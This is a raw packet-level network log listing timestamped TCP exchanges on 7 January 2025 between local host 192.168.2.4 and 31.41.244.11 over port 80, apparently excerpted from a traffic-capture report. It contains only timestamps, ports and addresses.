Jan 7, 2025 10:09:04.319139957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319163084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319173098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319201946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319201946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319205999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319219112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319240093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319256067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319267988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319272995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319284916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319303989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319318056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319319010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319329977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319334984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319349051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319350958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319363117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319380045 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319405079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319407940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319416046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319427967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319437027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319437027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319447041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319458008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319464922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319480896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319495916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319500923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319515944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319555998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319565058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319569111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319576025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319586992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319619894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319648981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319706917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319719076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319732904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319742918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319749117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319757938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319760084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319768906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319802999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319808006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319808006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319813967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319824934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319856882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319861889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319878101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319889069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.319895983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.319950104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347332954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347397089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347412109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347423077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347445011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347445011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347479105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347486973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347498894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347511053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347520113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347522020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347538948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347557068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347568035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347572088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347572088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347606897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347659111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347670078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347691059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347702026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347709894 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347718954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.347759962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.347760916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.348094940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348192930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348220110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348231077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348246098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.348272085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348292112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.348295927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348345995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.348345995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.348365068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348467112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.348561049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.348613024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.370527983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370548010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370558023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370573044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370583057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370618105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.370618105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.370661020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.370706081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370718002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370733976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.370769978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.370790005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404652119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404664040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404675007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404685974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404696941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404709101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404720068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404731035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404737949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404803038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404814959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404820919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404829979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404841900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404851913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404863119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404863119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404870987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404889107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404901981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404901981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404905081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404922009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404922962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404937029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404947042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404953957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404958010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404968977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.404983997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.404990911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405010939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405028105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405035973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405040026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405050993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405066967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405076981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405076981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405077934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405091047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405102015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405107975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405112982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405117989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405119896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405119896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405128956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405139923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405169010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405214071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405875921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405937910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405941963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.405951023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405961037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.405991077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.406023979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407010078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407022953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407032967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407043934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407054901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407066107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407073021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407093048 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407118082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407130003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407131910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407131910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407143116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407155037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407161951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407166958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407179117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407202959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407205105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407217979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407227993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407242060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407254934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407254934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407268047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407325983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407423973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407433987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407444000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407454967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407465935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407476902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407485962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407489061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407507896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407507896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407521963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407524109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407533884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407535076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407551050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407579899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407633066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407691956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407702923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407713890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407723904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407735109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407744884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407756090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407766104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407766104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407766104 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407780886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407792091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407799959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407803059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407814980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407829046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407833099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407845020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407854080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407855034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407869101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.407896042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.407896042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434104919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434118032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434129000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434139967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434150934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434161901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434174061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434178114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434201002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434221983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434235096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434252024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434263945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434264898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434292078 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434319019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434374094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434385061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434396029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434444904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434912920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434923887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434942961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434961081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434972048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.434979916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.434990883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.435014009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.435025930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.435045004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.435090065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.457390070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457406044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457417011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457427979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457485914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457485914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.457496881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457509041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457509995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.457520962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.457540035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.457571030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.457644939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.490788937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490845919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.490864038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490884066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490900993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490914106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490915060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.490928888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490950108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490962029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.490968943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.490968943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491015911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491061926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491107941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491158009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491185904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491213083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491230965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491256952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491256952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491261005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491276026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491286993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491296053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491296053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491322994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491333008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491333008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491338968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491354942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491422892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491431952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491431952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491434097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491446018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491456985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491461992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491473913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491480112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491509914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491530895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491548061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491558075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491589069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491616011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491628885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491641998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491677046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491683006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491695881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491704941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491725922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491756916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.491950035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491961956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491976976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.491997957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.492012024 CET	80	50017	31.41.244.11	192.168.2.4
